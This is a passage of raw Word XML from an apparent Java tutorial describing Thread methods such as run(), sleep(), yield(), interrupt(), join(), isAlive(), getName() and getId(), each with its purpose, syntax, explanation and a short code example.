          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC1EC75" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1166"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> This method contains the code to be executed by the thread. You need to override this method when creating a custom thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39993738" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1166"/>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Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E83CB4" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1166"/>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public void run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796DABAA" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1166"/>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Explanation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The run() method is called when the thread is started using the start() method. It contains the logic of what the thread will do when executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5F96A2"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public class MyThread extends Thread {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1122CB0D"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED4717C"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public void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371291FE"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System.out.println("Thread is running.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E777F22"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29552E98"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E93EA2" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66149647"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MyThread t = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED6224C"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start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EE84CB" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. sleep(long millis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546928A7" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1167"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Causes the currently executing thread to sleep for the specified amount of time (in milliseconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61495E64" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1167"/>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Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B7065B" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1167"/>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public static void sleep(long millis) throws InterruptedException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467BBDB4" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1167"/>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Explanation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The sleep() method pauses the execution of the current thread for the specified amount of time. After the sleep time expires, the thread moves back to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14298AC5"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BD5C05"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Thread.sleep(1000);  // Sleep for 1 second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337FE4FD"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catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C808817"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e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F1AD73"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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4797FF7A" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. yield()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D30B7F9" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1168"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A thread suggests that the current thread is willing to yield its current use of the CPU and allow other threads of the same priority to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410E9E54" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1168"/>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Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DCD24E" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1168"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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public static void yield()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7CF9B6" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1168"/>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Explanation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> This method is a hint to the thread scheduler to allow other threads of the same priority to execute. However, it is not guaranteed to cause the thread to yield, as the thread scheduler may choose to ignore this request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2784B33B" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="36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hread.yield();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DC9881" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5. interrupt()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D35DF0" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Interrupts the thread. If the thread is sleeping, waiting, or doing something that can be interrupted, the interrupt flag is set, and the thread will throw an InterruptedException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C78832" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>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Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C0AEFF" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>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public void interrupt()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C063565" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>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Explanation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The interrupt() method sets the interrupt flag for the thread. If the thread is waiting or sleeping, it will throw an InterruptedException. If the thread is in a normal execution state, it will continue its execution, but you can periodically check whether the thread has been interrupted by using Thread.interrupted() or isInterrupted().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653B257A"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hread t = new Thread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2919A598"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start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F27DC0"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interrupt();  // Interrupts the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCF1E2C" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6. isAlive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C53549" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1170"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Checks if the thread is currently alive (i.e., has been started and has not yet finished execution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2899E6F2" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1170"/>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Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333D98F3" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1170"/>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public boolean isAlive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2168BF" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1170"/>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Explanation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Returns true if the thread is alive (i.e., the thread has been started and is still running or in the runnable state). Returns false if the thread is dead (i.e., it has finished execution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BC4E00"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hread t = new Thread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040939A9"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start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F5ABD5"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System.out.println(t.isAlive());  // Returns true if thread is alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCE075D" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7. join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FD2D5D" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1171"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Causes the current thread to wait until the thread on which join() is called has finished executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C21391" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1171"/>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Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00755FCC" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1171"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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public void join() throws InterruptedException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E8B87A" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1171"/>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Explanation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When a thread calls join() on another thread, it will wait for that thread to finish its execution before proceeding. You can also specify a timeout for how long to wait before proceeding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F9EFF8"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hread t = new Thread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A77E5A8"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start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B2370C"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F6991C"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t.join();  // Main thread will wait for 't' to finish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265C812B"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catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D418BA"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 xml:space="preserve">    e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C563B2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538E927B" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8. getName() and setName(String name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F966B67" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1172"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> These methods get and set the name of the thread, respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A3056A" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1172"/>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Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511399C9" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1172"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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public String getName()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FF8B88" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1172"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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public void setName(String name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2198E69B" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1172"/>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Explanation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The getName() method returns the name of the thread, and setName() allows you to set a custom name for the thread. Thread names can be useful for debugging and logging purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D38814"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hread t = new Thread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B180A7C"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setName("MyThread");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5456F8C3"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System.out.println(t.getName());  // Output: MyThread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279226C9" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>9. getId()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE6AD9C" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1173"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Returns the unique identifier for the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289F032E" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1173"/>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lastRenderedPageBreak/>
        <w:t>Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7749B674" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1173"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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public long getId()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E96990" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1173"/>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Explanation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Every thread in Java has a unique ID that can be retrieved using getId().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5283A908"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hread t = new Thread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF86B14"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System.out.println(t.getId());  // Prints the thread ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1830A992" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
